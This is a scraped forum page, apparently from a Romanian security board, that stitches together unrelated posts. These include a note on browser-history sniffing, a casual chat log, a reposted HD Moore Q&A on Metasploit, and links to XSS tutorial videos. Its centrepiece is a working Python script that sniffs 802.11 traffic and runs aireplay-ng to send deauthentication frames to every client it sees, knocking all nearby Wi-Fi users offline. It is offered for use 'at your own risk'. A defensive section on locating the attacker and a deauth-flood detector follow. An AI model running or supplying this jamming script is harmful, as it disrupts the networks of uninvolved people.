It correctly identified 11 major sites which I have visited recently and actually displayed the exact Wikipedia pages I've visited in the past. They've also extended the attack even further to get people's ZIP codes from sites which utilize it (weather & movie sites for example). Plus some other sites I've visited (Twitter, Google sites, Archive.org, Speedtest.net etc). It's still limited in scope as stated by the researchers, but once again it's a nice extension of an old attack which yields a lot more accurate data. It can also parse out from RSS feeds on news sites to probe for articles you might have recently read if it has already discovered that you have visited the main URL. We'll have to see how Mozilla attempts to address this in Firefox 4 and if it really works.

Many more details are available in a PDF of their report, which you can grab here: p26.pdf

Source: The Register
-
I'm better at rubber-hose cryptanalysis.
-
How to burn down any wireless network around you
begood replied to begood's topic in Tutoriale in engleza
can't wait. I don't have access or the time for this right now.
-
How to burn down any wireless network around you and how to find out the exact location of a wireless laptop

I made a program which will monitor the air for connections between wireless hot spots and hosts; if the program finds a connection it will send a deauth packet which will disconnect the client. This goes at such a high speed that clients will have no chance to establish a proper connection to the router.

#!/usr/bin/python
# WLAN blackout: sniff in monitor mode and, for every frame seen between an AP
# and a station, shell out to aireplay-ng to send a deauthentication frame.
try:
    import sys, os
    from scapy.all import *
except ImportError:
    print("[-] Could not import all needed things, be sure you have Python, aircrack-ng and scapy installed")
    raise SystemExit(0)

def deauth_flood(p):
    if p.haslayer(Dot11):
        mac = {}
        mac["ap"] = p.sprintf("%Dot11.addr1%")        # receiver address, treated as the AP
        mac["station1"] = p.sprintf("%Dot11.addr2%")  # transmitter address, treated as the client
        if mac["ap"] != "ff:ff:ff:ff:ff:ff" and mac["station1"] != "None":
            # one deauth (-0 1) per sniffed frame; remove " &" for a slower attack rate
            os.system("aireplay-ng -0 1 -a " + mac["ap"] + " -c " + mac["station1"] + " " + sys.argv[1] + " &")

def instructions():
    print("== WLAN blackout - written by Jelmer de Hen - published at http://h.ackack.net ==\n\ninstructions:\n")
    print("python " + sys.argv[0] + " [iface]")
    print("python " + sys.argv[0] + " mon0")

if len(sys.argv) > 1:
    print("[+] Searching for packets...")
    sys.exit(sniff(iface=sys.argv[1], prn=deauth_flood))
else:
    sys.exit(instructions())

Use at your own risk. You won't be detected too fast since you send entirely spoofed packets, but with the right equipment and skills on the victim's side he will be able to do it; normally when these kinds of attacks are launched at companies they have to ask the ISP to come with a special device which will track down the exact location of the device.

But what when you are being targeted by this attack?

First you have to know that this might be hard to detect since it can be exploited from very custom locations; think about:

- Attacker at one location not too far away, for example in a car
- Moving attacker walking around with a laptop in a bag
- Infected/botted computer(s) of any kind; in this case it could even be your heat pump or lighting control system
- Malicious pineapples
- Phones (like the iPhone)
- Satellite dish pointed at you
- Infected satellite

Understand that it is impossible to counter some of these attacks, but an iPhone or car should be traceable.

Requirements:

- Movable Linux based PC with wireless capability; if you don't have a *nix system you can download BackTrack for free, burn it to a DVD and boot from it; in case your PC can't boot DVDs you can go for an Ubuntu live CD or another distribution. Booting from these CDs won't change anything on your actual system.
- Wireshark (free)
- Aircrack-ng (free)

Optional:

- portable antenna
- tin foil
- scissors
- glue
- cardboard (or other hard bendable material)

Why tin foil, scissors and cardboard? To locate the attacker; it would be ideal to have a parabolic reflector to decrease the time it will take to localize the attacker. You can make the windsurfer or be creative and make something custom; the idea is that you eliminate one side of the antenna and reflect that to the side you point it to, to increase your range and eliminate the chance of the attacker being behind the antenna.

When you have all requirements you can get started: move into the middle of the deauth packet storm and turn on Wireshark and airodump-ng. In Wireshark apply "radiotap.length==13" as filter (captures all deauth packets) and make a list of all hosts you see in airodump-ng. Look at the rate at which you capture deauth packets and look in the bottom fields for the connections between routers and hosts; look at the PWR levels here.

Now move the windsurfer 90 degrees and look at the rate at which you capture the deauth packets now; decide if it was less or more, and redo this process until you find the location where the deauth packets have the highest rate. When in a building it would be smart to also look below and above you.

Once you have localized the location where most deauth packets came from, move your PC closer to that source, then redo the process of monitoring where the packets come from and look at aircrack-ng. Once you are very, very close you can determine which MAC address is doing this by looking it up in airodump-ng; this machine at that moment will have a very low PWR (0 to -50 is good enough).

Now run this command in bash to determine the manufacturer of the card so you know something more about the attacking machine:

cat `locate manuf` | grep 00:11:22

Replace the last part with the first part of the MAC address; for example when you found the MAC address 55:44:33:22:11:00 then 55:44:33 is the part you will need. Please note that this MAC address can be spoofed and/or not broadcasting so you won't be able to see it; then you have to do it all with Wireshark and determine where the most packets come from.

After you did all this you can just grab that malicious pineapple and smash it as hard as you can.

This cheap attack vector can form a high risk level during war; when properly exploited an army can attack an entire city by pointing a satellite dish in their direction, or think about an attacker which takes over a satellite and reprograms it to be able to do these kinds of attacks. With these techniques it will be hard to prevent those attacks unless we make big tin foil shields around our cities.

I gave you some basic solutions to find the attacker, but this antenna detection method works great for other purposes too: I once tried this on a friend of mine in my old school to find out his location; it was a multi-floor school building and I had no idea where he was, and within 15 minutes I found him.

// who's going to test it?

How to burn down any wireless network around you and how to find out the exact location of a wireless laptop
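Added example, not part of the original post or of Jelmer de Hen's script: the defender's side of the article in code. The post says to count deauth frames in Wireshark and to distrust the source MAC because aireplay-ng spoofs it; this detector does both over raw 802.11 management frames. It assumes the frames arrive as (timestamp, RSSI in dBm, raw frame) tuples with the radiotap header already stripped (how you get them from your capture tool is up to you), and the AP/client addresses and the whole capture below are constructed, not recorded. It groups deauth/disassoc frames by the transmitter address they claim, finds the peak count in any one-second window, and compares their signal strength with the non-deauth frames (beacons) that the same MAC sends: a large RSSI gap is the sign that the deauths are coming from a different radio than the one that owns the address.

```python
"""Deauth-flood detector over raw 802.11 frames (added example, not the original script)."""
import struct
from collections import defaultdict

MGMT = 0                              # 802.11 frame type 0 = management
BEACON, DISASSOC, DEAUTH = 8, 10, 12  # management subtypes we care about

def _mac(b):
    return ":".join("%02x" % x for x in b)

def _frame(subtype, addr1, addr2, addr3, body=b"", seq=0):
    """Build a bare management frame: frame control, duration, 3 addresses, seq control, body."""
    fc = (MGMT << 2) | (subtype << 4)   # bits 0-1 version, 2-3 type, 4-7 subtype
    return struct.pack("<HH", fc, 0) + addr1 + addr2 + addr3 + struct.pack("<H", seq << 4) + body

def parse_mgmt(raw):
    """Return (subtype, addr1, addr2, addr3, reason) for a management frame, else None."""
    if len(raw) < 24 or ((raw[0] >> 2) & 0x3) != MGMT:
        return None
    subtype = (raw[0] >> 4) & 0xF
    reason = None
    if subtype in (DEAUTH, DISASSOC) and len(raw) >= 26:
        reason = struct.unpack("<H", raw[24:26])[0]   # reason code, little-endian
    return subtype, _mac(raw[4:10]), _mac(raw[10:16]), _mac(raw[16:22]), reason

def detect_deauth_flood(frames, window=1.0, threshold=10):
    """Group deauth/disassoc frames by claimed transmitter (addr2), find the peak count in any
    sliding window of `window` seconds, and compare their RSSI with that MAC's other frames."""
    deauth_ts, deauth_rssi, other_rssi = defaultdict(list), defaultdict(list), defaultdict(list)
    for ts, rssi, raw in frames:
        p = parse_mgmt(raw)
        if p is None:
            continue
        subtype, _, tx, _, _ = p
        if subtype in (DEAUTH, DISASSOC):
            deauth_ts[tx].append(ts)
            deauth_rssi[tx].append(rssi)
        else:
            other_rssi[tx].append(rssi)
    alerts = []
    for tx, stamps in deauth_ts.items():
        stamps.sort()
        peak, start = 0, 0
        for i, t in enumerate(stamps):           # sliding window over sorted timestamps
            while t - stamps[start] > window:
                start += 1
            peak = max(peak, i - start + 1)
        if peak < threshold:
            continue
        avg_deauth = sum(deauth_rssi[tx]) / len(deauth_rssi[tx])
        avg_other = sum(other_rssi[tx]) / len(other_rssi[tx]) if other_rssi[tx] else None
        alerts.append({
            "transmitter": tx, "peak_per_window": peak, "total": len(stamps),
            "deauth_rssi": round(avg_deauth, 1),
            "other_rssi": None if avg_other is None else round(avg_other, 1),
            # a big gap between the two RSSI averages means the deauths did not come from the
            # radio that normally uses this MAC, i.e. the source address is spoofed
            "likely_spoofed": avg_other is not None and abs(avg_deauth - avg_other) > 15,
        })
    return alerts

def sample_capture():
    """Constructed capture (not recorded): a real AP beaconing at -42 dBm, a client, and 40
    deauths in 2 s that claim to come from the AP but arrive at -71 dBm (the attacker's radio)."""
    ap, sta, bcast = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"), b"\xff" * 6
    frames = []
    for i in range(5):                                    # beacons every 100 ms
        frames.append((i * 0.1, -42, _frame(BEACON, bcast, ap, ap, seq=i)))
    for i in range(40):                                   # spoofed deauths, reason code 7
        frames.append((0.05 * i, -71, _frame(DEAUTH, sta, ap, ap, struct.pack("<H", 7), seq=i)))
    return frames

if __name__ == "__main__":
    for alert in detect_deauth_flood(sample_capture()):
        print(alert)
```

The threshold of ten frames per second is a starting point, not a rule: a busy AP legitimately sends a handful of deauths per minute, a flood from the script above sends one per sniffed frame. The RSSI comparison is what the article's windsurfer does by hand, and it is the part to rely on once you accept that the MAC field tells you nothing.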
-
Multiupload.com - upload your files to multiple file hosting sites!
RapidShare: 1-CLICK Web hosting - Easy Filehosting
MEGAUPLOAD - The leading online storage and file delivery service
Hotfile.com: One click file hosting: XSS-VIDEOS-SlicK-rstcenter.com.rar
zSHARE - XSS-VIDEOS-SlicK-rstcenter.com.rar
Download XSS-VIDEOS-SlicK-rstcenter.com.rar for free on uploading.com
2shared - download XSS-VIDEOS-SlicK-rstcenter.com.rar
-
I think daemien is cursing me out like crazy, ask him )))
-
Thanks brothers! I haven't had a better day than this one (and I'm not only talking about the thread )
-
We conducted our third live chat this week, this one with HD Moore, the founder of the Metasploit Project and the CSO of Rapid7. Moore got a lot of great questions on a wide variety of topics, so if you weren't able to join us, here's a full transcript of the chat.

Dennis Fisher: Hi everyone, and welcome to our live chat with HD Moore.

Dennis Fisher: This one came in through Twitter: Where did the original idea for Metasploit come from?

HD_Moore: Metasploit was started as a curses-based network game similar to "Overkill"; the idea was that the local network would be represented as a grid and live hosts would show up as points on the map. As you ran various exploits, the payload would spawn a listener that echoed the user ID, allowing a network scanner to keep score. It was the game you could play anywhere. The game was originally called "BFEG" - the acronym should make sense for anyone who played DOOM.

Dennis_fisher: Via Twitter: what are the commercial plans for metasploit?

HD_Moore: As of yesterday, we now offer Metasploit Express - a commercial penetration testing product that is supported by the Rapid7 team and shares a common codebase with the open source Metasploit Framework. The Express product is made up of three components: the open source framework itself, the Workflow Manager, and the User Interface. We are using the exact same framework code in the commercial product as is available for free from the Metasploit.com web site. By using a shared codebase, we have a vested interest in making sure that the open source framework continues to improve. All exploits, payloads, and core functionality in the Express product are available through the open source framework APIs.

Dennis_fisher: Are there a lot of companies still that don't think pen testing is important?

HD_Moore: Over the last 10 years, awareness of vulnerability assessments and the available tools has increased dramatically. Adoption of penetration testing and the related tools and products is still behind, but this should improve as more companies become aware of the benefits gleaned from penetration testing. I personally feel that the Metasploit project has helped increase awareness in this area.

ryanaraine: What's your policy on disclosure as it relates to putting exploits for unpatched vulnerabilities into Metasploit? Is there a "responsible" approach to doing this, in your mind?

HD_Moore: The official policy is that any vulnerability in the public domain is fair game to add to the Metasploit Framework. We want to make sure that for any public threat, our users have the ability to test their systems and their defenses, even if no patch is available.

Dennis_fisher: What is the craziest/weirdest hardware platform you have seen or heard of that somebody got Metasploit running on?

HD_Moore: The most bizarre platform we have ever seen Metasploit running on was a wrist-watch; an attendee of the recent SOURCE Boston conference said that he was able to get Metasploit running on his Linux-based watch, but he had trouble getting the wifi drivers working correctly to use it.

Dennis_fisher: via email: will there always be an open source version of the framework?

HD_Moore: Absolutely. The great thing about the BSD license is that if we don't do a good job of maintaining the framework, someone else can fork it. That is a great motivator to putting resources into the open source codebase.

me: With the integration between Metasploit Express and Nexpose, what's next on the horizon?

HD_Moore: Long term we want the NeXpose and Metasploit products to be able to share data in both directions. Right now, we use Metasploit exploit information to help prioritize vulnerabilities in the NeXpose interface, and we have the ability to import NeXpose data into Metasploit (and Metasploit Express). The next step is to bring the results from a penetration test using Metasploit back into the NeXpose interface, and allow ticketing, remediation, and risk prioritization based on live penetration test results.

danuxx: what would be the difference between Metasploit express and CANVAS/Core Impact?

HD_Moore: Tons! The goal of Metasploit Express is to make penetration testing easy to automate and extremely effective; this means going outside of just exploits and automating common penetration testing tasks. We think we made great progress with the first version of Metasploit Express, but we still have a long way to go. I want penetration testing tools and products to become as commonplace as port scanners and vulnerability assessment tools -- we want penetration testing to become much more mainstream.

ryanaraine: a quick follow up: define "public domain".

HD_Moore: By public domain I mean any exploit being actively exploited in the wild, or where the details or patch are already public.

danuxx: What is the cost of a Metasploit express license?

HD_Moore: Metasploit Express is about $3000 USD, per user, per year.

Darren: It seems a bulk of the security risks are based around older versions of Windows. Do you see this impacting the framework's usability in the next 2-5 years?

HD_Moore: No doubt that standard buffer overflows are going the way of the dodo when it comes to consumer operating systems. The terrible (or great, depending on what you do) thing is that all of those third-party products and rich client-side applications are still as bad as ever. We are finally seeing reasonable improvements around browser security, but we still have a long way to go before standard exploits become less effective. Long-term, I believe typical code execution flaws will start to dry up as we move to managed code platforms and sandboxes. The move to 64-bit will help as well. However, keep in mind that most of the random SCADA gear being sold today still uses old x86 processors, often running consumer operating systems.

Security-Database: As I asked you before when I first saw Metasploit merging with Rapid7, should we expect a closed source of Metasploit as happened with Nessus!!!

HD_Moore: Absolutely not. Metasploit will always be open source, regardless of what we do on the commercial side. The license guarantees this.

Dennis_fisher: via email from Mubix: If you had an "I'd rather be" sticker on your car, what would it say?

HD_Moore: Scraping This Sticker Off

amaged: Where did all the exploit writers that we had back in the early years of this decade go?

HD_Moore: Between 2001 and 2003 many of the "old school" exploit developers moved on - some of them changed industry entirely, others went into management, and others continue to write exploits today, but either keep them private, or release them under a new handle. It's still a pretty small world when it comes to exploit development and vulnerability research.

ryanaraine: What's the story with that badass Miami Vice white suit at Black Hat last year? Are you breaking it out again?

HD_Moore: It was a coordination fail with a friend of mine; here it is, being done right: Quahogcon on Flickr - Photo Sharing!

Fitty_RST: Is it true that black_death helped you coding the Metasploit?

HD_Moore: The core members of the Metasploit team were Matt Miller (skape) and Spoonm <real name censored>. The handle "black_death" is well known in our private group.

Dennis_fisher: from Jack Daniel: what would YOU like to tell us? I know you have lots of knowledge to share.

HD_Moore: Find something you love to do, then figure out how to get paid to do it. Too many folks getting started in security look at it as a min/max of optimising skills based on potential salaries. If you are passionate about what you do, the rest is easy.

brianT: what does the HD stand for?

HD_Moore: My first name is actually "H" (one letter), my middle name is "D"; this is the name I have always had, but the reason behind it is a much longer story that requires a significant infusion of alcohol to answer.

1epi: What will be the *major* differences between Metasploit Express and the old one?

HD_Moore: Metasploit Express uses the open source framework; the advantages of Metasploit Express over the normal framework are ease of use, a slick user interface, commercial support, some really cool automation, detailed audit logs, and reporting. You can see some of the screenshots online at Metasploit Express Gallery - Penetration Testing Accelerated

parker: People often ask me how to get started with Metasploit. I tell them to load it in a VM along with a couple different target OS's and start banging on it. They are rarely successful. How would you answer that question?

HD_Moore: The hardest part about learning Metasploit is finding a safe target to test against. The Windows licensing model makes it really tough for us to share a standardized image; however, we just released (soon to be announced) a free Linux virtual machine you can use for target practice with both Metasploit and Metasploit Express. You can find the BitTorrent link online at Metasploit Express Community - Penetration Testing Accelerated and a blog post with full details will be available later today.

danuxx: What do you think about Windows OS security improvements (SafeSEH, NX, DEP, ASLR, etc)? Is it going to be easier to bypass those security controls? Taking into consideration Skape and others are now on the defensive side.

HD_Moore: Skape and his work on SEHOP basically killed SEH overwrites. NX, DEP, and ASLR all make things more difficult, as does the slow migration to 64-bit architectures. We are going to see more attacks against third-party applications missing these protections and much more complicated and potentially less reliable exploits for client-side applications. Over the long term, I think that memory corruption flaws will eventually be focused on embedded devices and consumer electronics, with input validation, logic bugs, and social engineering attacks becoming the norm.

danuxx: CANVAS/Core Impact deliver ready to use exploits one day to one week after discovery. Will Metasploit Express get the resources to do that?

HD_Moore: Metasploit Express has the ability to update within the product; it uses the same exploits and payloads that are committed to the Metasploit Framework. Currently, Metasploit has support for over 550 exploits, which is pretty competitive with the commercial offerings today. We do not see exploit coverage as a differentiator for the Express product and will continue to add exploits as we write them to the free tree. The update frequency for Express is still being defined, but weekly would give us enough time for QA and should be doable.

1epi: Who is working on exploit dev on Metasploit Express?

HD_Moore: Exploit development in the Express product is exactly the same as exploit development in the open source framework. Joshua Drake manages the exploit development process in Metasploit as a Rapid7 employee and we continue to receive contributions from around the world, which are all reviewed and sanitized by the core team.

brianT: Besides a strong passion for what you do, what else do you credit for your success?

HD_Moore: Lack of a social life and a very understanding wife

me: Can you send me instructions on getting Metasploit Express (or even Metasploit) running on my Droid?

HD_Moore: Express would not be supported directly on the Droid; however, you can install Express on a remote server and access the web interface from any mobile device supporting SSL and JavaScript. The interface works just fine on the iPhone and the N900. Running the open source framework on the Droid should be possible if you root it and install native Ruby; we are working on JRuby support, but it's not ready for production use yet.

offroad99ff: Are you involved in any other open source development projects?

HD_Moore: I wish I was - I am way behind on WarVOX development and haven't had time to significantly contribute to other projects over the last year.

Raaka: HD: GP-GPUs (Nvidia 470 or GeForce 9000 series or nForce 790SLi motherboards etc) are getting cheap; does it make any difference in exploit development/application security? Because the developers are choosing to use CUDA using 100's of cores.

HD_Moore: I think we are starting to reach the point where GPU technology (and more importantly, compilers that don't require refactoring) is starting to change the economics of consumer-level high-performance computing. Security algorithms that depend on raw computing power alone (the WPA hashing routine) are going to be hurt the worst; but I look forward to the day that trivial hashes are just a GPU lookup to crack.

JimK: I just heard about Metasploit Express. Can you talk about what features it has re report generation?

HD_Moore: Metasploit Express uses a backend database to store the results of every action and the state of the target network. The reporting capabilities are split between "live reports" and "generated reports"; the live reports let you generate a report at any state of the penetration test. If you simply want to scan for live hosts and report it, just use the Scan feature and go print out a report. If you want to show the screenshots and audit logs of all of the systems you compromised, the detailed audit report covers this. The generated report types include Word and PDF; these are static once generated and do not change based on the state of the test. We also support generating XML and ZIP reports, which contain a full XML schema for building your own reports or integrating into third-party tools. Finally, we have a report type called "Replay" which exports a ZIP file containing Metasploit Console resource scripts - these can be plugged into the free framework to reproduce every successful exploit in Express on a separate system, allowing you to give your client a free value-add for reproducing your test results.

Darren: What is the relationship with the folks over at Offensive-Security, and any idea if we can expect to see more "Unleashed" documentation?

HD_Moore: We have a friendly relationship with the Offensive Security folks, but nothing formalized. Metasploit Unleashed is a great resource and we hope they continue to update it.

danuxx: which has been the most challenging exploit that you have developed?

HD_Moore: I would split this into two categories: the ones where my skill level was severely lacking (my first exploit for the Apache chunk encoding bug took months to make reliable) and exploits where the exploit conditions are really tough. My favorite exploit is a bug in a CA product where the product would dereference a random heap pointer. By sending repeated requests that triggered an exception, the heap would never be freed, and eventually the memory address used to store the incoming request would align with the random corrupted heap pointer, leading to code execution.

thew00: what made you start doing what you do now?

HD_Moore: I have always liked breaking things; software is fun because you can keep breaking the same product over and over again without having to bust out the crazy glue. These days it's still about breaking things; it's just highly automated and methodical.

t0futim: has your position on ethical disclosure changed over the last 3 years? if so, how?

HD_Moore: My view on disclosure hasn't changed much since I got started - my personal view is that the fastest way to fix something is to publish information about it.

ryanaraine: What OS/browser combo do you personally use? And why?

HD_Moore: Is Ryan tuning his exploits? He already has me running a Java chat client, what else does he need? (I am actually using Windows 7 64-bit and Firefox; but I spend 90% of my time inside one of the 10 VMs I have running)

danuxx: Which is the methodology you use to find bugs? Do you use SPIKE for fuzzing?

HD_Moore: I try to strike a balance between reverse engineering and fuzzing - dissect a product just enough to figure out where requests are processed and what types of inputs may cause problems, then write a specific fuzzer to target that. I wrote most of the fuzzer modules in Metasploit, which can give you some idea about my approach (modules/auxiliary/fuzzers/)

Dennis_fisher: We're just about out of time. Thanks everyone for joining the chat, and HUGE thanks to HD for his time today. Thanks and we'll see everyone next month for our next live chat!

Q&A: HD Moore | threatpost

// supposedly I'm in there somewhere too
-
Thanks. @Xander I have 3, I'm keeping one for "emergencies".
-
When you reach 20 quality posts you get one from me.
-
@yceman_yceman I'm sincerely sorry bro, my day was awesome (dae knows more ))))) )

@life sucks... so FUCK IT! )))))))))) fuck it twice around, in different places, within 2 hours, it's much better. )

A terrible day: I woke up with a friend, in a field, 50 km from my city, two steps from the train tracks. Fuck knows how I got there; good thing I found a road and caught a truck after about 2 hours of walking along the rails.